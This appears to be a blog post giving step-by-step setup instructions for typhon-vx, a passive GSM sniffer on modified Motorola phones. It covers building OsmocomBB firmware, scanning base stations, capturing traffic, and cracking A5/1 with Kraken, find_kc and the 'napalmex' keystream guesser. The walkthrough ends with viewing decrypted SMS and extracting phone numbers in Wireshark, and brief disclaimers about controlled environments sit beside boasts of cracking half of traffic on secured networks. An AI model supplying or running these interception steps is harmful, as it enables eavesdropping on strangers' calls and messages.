This is the structure of the tools attack method:
the above setup allows 8 channels sniffing, and will cost around 400 USD, this is a passive GSM sniffer and should be used only in a controlled environment. The tool includes an optimized keystream guesser “napalmex” (peaking at 99% success rate on insecure networks and with approx. 50% success rate even on secured networks), now again chit chatter.
here is the github source page: typhon-vx
so, setup procedure :
*** What you will need + A recent Linux distribution (tested Debian Wheezy and Fedora on x86 and amd64) + An osmocom-compatible phone (Motorola Cxxx) or modem (openmoko/freerunner) and serial interface to it + Wireshark 1.8.0 or newer + ~600 MB of disk space + some good skills It would be nice to have + More phones + Uplink filters removed Phones have bandpass filter that they don't receive uplink well (only 10-30m). http://bb.osmocom.org/trac/wiki/Hardware/FilterReplacement or here + Access to a fast A5/1 cracker (demand 1s/burst throughput and 10s latency :) It is possible to do some work on desktop with 2TB harddrive, but it's extremely slow. + Genuine brmbora™ hardware with Next-Businness-Day support (or a typhon-Box << coming soon) The compilation of all sources will take several minutes on a modern Core i* computer or 2 hours on Intel Atom netbook. *** OsmocomBB firmware http://bb.osmocom.org/trac/wiki/GettingStarted + Install ARM toolchain. The phone is an arm, so we will cross-compile on our x86. + git clone git://git.osmocom.org/osmocom-bb.git + git checkout sylvain/burst_ind this branch has patched DSP so it allows us to sniff traffic off-the-air + make *** Installing other tools + Copy mysrc/.omgsm to ~ + edit ~/.omgsm/config and ~/.omgsm/phones GSMPATH=path to this GSMDEFSESSION=where sniffed data are stored (usually several MB per hour) GSMMAXCELLS=when scanning for BTS, pick N strongest GSMKRAKENHOST,GSMKRAKENPORT=where your A5/1 cracker lives they tend to listen only on localhost, so try ssh -L 6666:localhost:6666 GSMBRMBORACTL=where brmbora™ conTROLLer is leave blank if you don't have a brmbora™ genuine device and order on at shop.brmlab.cz GSMSESSION=current session, will be set automatically on first run + cd mysrc; make + Kraken will tell you the secret state at some round of A5/1 keystream generator. You need something to backclock (revert and extract original key) the cipher. Use find_kc from Kraken-Utilities patched with our version to support uplink. git clone git://git.srlabs.de/kraken.git cd kraken/Utilities cp mysrc/find_kc.cpp . make find_kc deposit the binary to GSMPATH/kraken/Utilities/ *** Initializing hardware Check scripts in bin/ + gsm_init_hw.sh + Without a brmbora™ genuine device you need to press button on your phone. + You should see the firmware loading. The correct output should have the following features: Received PROMPT1 from phone, responding with CMD read_file(../../target/firmware/board/compal_e88/hello_world.compalram.bin): file_size=27192, hdr_len=4, dnload_len=27199 Received PROMPT2 from phone, starting download handle_write(): finished Received DOWNLOAD ACK from phone, your code is running now! LOST nnnn! If it got stuck before the "LOST" message, try again. Contact your brmbora™ authorized reseller in case of problems. *** Initianing a new session, scanning BTS + gsm_bts_scan.sh *** Investigating the SESSION direstory arfcn - what channels we will sniff on new/ - captured data tmsi2bursts.txt - phones seen on air and their data *** Start sniffing gsm_start_sniff.sh Some .dat files should appear in SESSION/new/. They are usually 5-15 kB each. FIXME We now have better sniffer using master-slave architecture useful if you have 4+ phones. See bin/gsm_spawn_master_slave.sh for more info. *** Viewing sniffed data with Wireshark iptables -A INPUT -p UDP --dport 4729 -j DROP # we will send dummy packets and kernel will reply with ICMP port unreachable start Wireshark on localhost gsm_convert -f SESSION/new/file-to-view.dat -d will convert data to GSMTAP frames and send them to Wireshark Some packets should appear in Wireshark: http://bb.osmocom.org/trac/wiki/WiresharkIntegration *** Cracking your own data from your very own phone of course! Use napalmex.py for a statistical keystream guesser with up to 100% efficiency on less-secure networks and ability to crack about 50% of traffic even on secure networks! *** Viewing cracked data start Wireshark on localhost gsm_convert -f SESSION/new/file-to-view.dat -k KEY Interesting .dat files are the bigger ones (10kB). Interesting frames are "GSM-SMS CP-DATA". See gsm_evenlog.sh for tips how to extract phone numbers, SMS messages etc. See this link for guessing which types of communication are in the file even before it is cracked: http://jenda.hrach.eu/brm/sms_analysis.pngP.S an acknowledgment to the original creators at brmlab kindly check out their superb projects, p.p.s modify it all you can :)